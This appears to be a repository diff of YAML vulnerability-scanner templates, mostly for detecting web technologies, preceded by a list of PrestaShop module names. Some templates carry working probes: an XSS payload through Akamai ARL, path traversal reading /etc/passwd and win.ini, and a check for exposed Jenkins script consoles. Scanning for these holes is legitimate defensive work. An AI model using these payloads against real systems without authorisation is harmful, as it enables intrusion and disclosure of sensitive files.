ps_pagaqui
ps_productinfo
ps_quality_checklist_opquast
ps_qualityassurance
ps_reminder
ps_rssfeed
ps_searchbar
ps_searchbarjqauto
ps_sharebuttons
ps_shoppingcart
ps_socialfollow
ps_specials
ps_supplierlist
ps_test
ps_themecusto
ps_viewedproduct
ps_wirepayment
psaddonsconnect
pscartabandonmentpro
pscleaner
psgdpr
psgiftcards
psograph
psphipay
pspixel
psrichsnippets
pssupport
rc_pganalytics
realexredirect
recaptcha
referralprogram
referralprogram/mails/pt
reforestaction
rem42_webservices
remarkety
revsliderprestashop
revws
safeshops
sakgiok_latinurls
sbe-challenge-phase4
scamstop
sd_eicmslinks
securitypatch
sekeywords
sellstrom
sendinblue
sendtoafriend
sensbitdhl
sensbitinpost
sensbitpaczkawruchu
seoexpert
seur
sfkhreflang
shiptomyid
shiptopay
shopgate
shopimporter
shoppingfluxexport
simplerecaptcha
simpleslideshow
simplifycommerce
sitemappro
skebby
skrill
smartblog
smartblogaddthisbutton
smartbloghomelatestnews
smprestaspeed
smseourl
social-login-prestashop
sociallikes
socialsharing
socolissimo
sofortbanking
solrsearch
soopabanners
soopamobile
stampsdotcom
statsbestcategories
statsbestcustomers
statsbestmanufacturers
statsbestproducts
statsbestsuppliers
statsbestvouchers
statscarrier
statscatalog
statscheckup
statsdata
statsequipment
statsforecast
statsgeolocation
statslive
statsnewsletter
statsorigin
statspersonalinfos
statsproduct
statsprofitmargin
statsregistrations
statssales
statssearch
statsstock
statsvisits
stickngo
storecommander
stripe_official
super-model
tagmanager
tawkto
tdpsthemeoptionpanel
text_simple
textmaster
themeconfigurator
themeinstallator
thirtybees-instamojo
tinkoffcredit1.6
tntcarrier
trackingfront
training
translatools
trustedshops
twenga
twengabid
twengafeed
upscarrier
uspbar
uspscarrier
vatnumber
videostab
vtermslideshow
vtermslidesshow
vtpayment
watermark
wdoptionpanel
welcome
wg24themeadministration
whatsapp
whyloginascustomer
xipblog
xipblogdisplayposts
yotpo
yousticeresolutionsystem
youtube_video
zeleriscarrier
zivosite
zopimfree

31
misconfiguration/akamai-arl-xss.yaml Normal file
View File

@ -0,0 +1,31 @@
id: akamai-arl-xss
info:
name: Open Akamai ARL XSS
author: pdteam
severity: medium
tags: akamai,xss
reference: |
- https://github.com/war-and-code/akamai-arl-hack
- https://twitter.com/SpiderSec/status/1421176297548435459
- https://warandcode.com/post/akamai-arl-hack/
- https://github.com/cybercdh/goarl
- https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
requests:
- method: GET
path:
- "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
condition: and
words:
- '"><svg onload=confirm(document.domain)>'
- 'Suggestions for improving the results'
- type: word
part: header
words:
- 'text/html'

28
misconfiguration/zabbix-dashboards-access.yaml Normal file
View File

@ -0,0 +1,28 @@
id: zabbix-dashboards-access
info:
name: zabbix-dashboards-access
author: pussycat0x,vsh00t
severity: medium
description: View dashboard with guest login.
reference: |
- https://www.exploit-db.com/ghdb/5595
- https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt
tags: zabbix,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/zabbix/zabbix.php?action=dashboard.list"
matchers-condition: and
matchers:
- type: word
words:
- "Create dashboard"
- "Zabbix SIA"
condition: and
- type: status
status:
- 200

1
takeovers/wordpress-takeover.yaml
View File

@ -12,7 +12,6 @@ requests:
path:
- "{{BaseURL}}"
redirects: true
matchers-condition: and
matchers:
- type: word

2
technologies/acontent-detect.yaml
View File

@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
redirects: true
matchers-condition: and
matchers:

28
technologies/apache-guacamole.yaml Normal file
View File

@ -0,0 +1,28 @@
id: apache-guacamole
info:
name: Apache Guacamole Login Page and version detection
author: r3dg33k
severity: info
tags: apache,guacamole,tech
requests:
- method: GET
path:
- "{{BaseURL}}/translations/en.json"
matchers-condition: and
matchers:
- type: word
words:
- 'Apache Guacamole'
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- '"VERSION":"[0-9]+\.2\.0"'

2
technologies/bigbluebutton-detect.yaml
View File

@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers-condition: and
matchers:

25
technologies/dolibarr-detect.yaml Normal file
View File

@ -0,0 +1,25 @@
id: dolibarr-detect
info:
name: Dolibarr detect
author: pikpikcu
severity: info
tags: tech,dolibarr
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: regex
part: body
regex:
- '<title>Dolibarr - Login Dolibarr(.*)</title>'
extractors:
- type: regex
part: body
group: 1
regex:
- 'center">(.*)</td>'

2
technologies/froxlor-detect.yaml
View File

@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers-condition: and
matchers:

2
technologies/getsimple-cms-detector.yaml
View File

@ -1,3 +1,5 @@
id: getsimple-cms-detector
info:
name: GetSimple CMS Detector
author: philippedelteil

24
technologies/influxdb-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: influxdb-detect
info:
name: InfluxDB Detect
author: pikpikcu
severity: info
tags: tech,influxdb
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>InfluxDB - Admin Interface</title>"
- type: status
status:
- 200

4
technologies/jellyfin-detect.yaml
View File

@ -12,14 +12,16 @@ requests:
- "{{BaseURL}}/web/home.html"
- "{{BaseURL}}/index.html"
- "{{BaseURL}}/web/index.html"
- "{{BaseURL}}/web/manifest.json"
matchers-condition: and
matchers:
- type: word
words:
- "name=\"application-name\" content=\"Jellyfin\""
- "class=\"page homePage libraryPage allLibraryPage backdropPage pageWithAbsoluteTabs withTabs\""
- "The Free Software Media System"
condition: or
part: body
- type: status
status:
- 200
- 200

2
technologies/node-red-detect.yaml
View File

@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers-condition: and
matchers:

24
technologies/opensis-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: opensis-detect
info:
name: OpenSIS Detect
author: pikpikcu
severity: info
tags: tech,opensis
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/opensis/index.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>openSIS Student Information System</title>"
- type: status
status:
- 200

1
technologies/openx-detect.yaml
View File

@ -11,6 +11,7 @@ requests:
path:
- "{{BaseURL}}/www/admin/"
matchers-condition: and
matchers:
- type: regex
part: body

2
technologies/sceditor-detect.yaml
View File

@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers-condition: and
matchers:

2
technologies/thinkcmf-detection.yaml
View File

@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers-condition: and
matchers:

2
technologies/wondercms-detect.yaml
View File

@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers-condition: and
matchers:

30
technologies/wordpress-gotmls-detect.yaml Normal file
View File

@ -0,0 +1,30 @@
id: wordpress-gotmls-detect
info:
name: Detect WordPress Plugin Anti-Malware Security and Bruteforce Firewall
author: vsh00t
reference: https://www.exploit-db.com/exploits/50107
severity: info
tags: wordpress,wp-plugin,gotmls
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action={{randstr}}&file=../../../../../../../../../Windows/win.ini"
matchers-condition: and
matchers:
- type: word
words:
- "gotmls"
part: header
- type: status
status:
- 302
extractors:
- type: kval
part: header
kval:
- Location

23
technologies/wso2-apimanager-detect.yaml Normal file
View File

@ -0,0 +1,23 @@
id: wso2-apimanager-detect
info:
name: WSO2 API Manager detect
author: righettod
severity: info
description: Try to detect the presence of a WSO2 API Manager instance via the version endpoint
tags: tech,wso2,api-manager
requests:
- method: GET
path:
- "{{BaseURL}}/services/Version"
matchers-condition: and
matchers:
- type: word
words:
- "version.services.core.carbon.wso2.org"
- type: status
status:
- 200

3
technologies/yapi-detect.yaml
View File

@ -9,8 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}:3000"
- "{{BaseURL}}"
matchers-condition: and
matchers:

23
vulnerabilities/jenkins/jenkins-script.yaml Normal file
View File

@ -0,0 +1,23 @@
id: jenkins-script
info:
name: Jenkins RCE due to accesible script functionality
author: philippedelteil
severity: critical
reference: https://hackerone.com/reports/403402
tags: jenkins,rce,devops
requests:
- method: GET
path:
- "{{BaseURL}}/script/"
matchers-condition: and
matchers:
- type: word
words:
- "println(Jenkins.instance.pluginManager.plugins)"
- "Scriptconsole"
condition: and
part: body
- type: status
status:
- 200

24
vulnerabilities/other/bems-api-lfi.yaml Normal file
View File

@ -0,0 +1,24 @@
id: bems-api-lfi
info:
name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download
author: gy741
severity: high
description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php
tags: lfi
requests:
- method: GET
path:
- "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

1
vulnerabilities/other/coldfusion-debug-xss.yaml
View File

@ -4,6 +4,7 @@ info:
name: Adobe ColdFusion Debug Page XSS
author: dhiyaneshDK
severity: medium
description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site.
reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml
tags: adobe,coldfusion,xss

Some files were not shown because too many files have changed in this diff Show More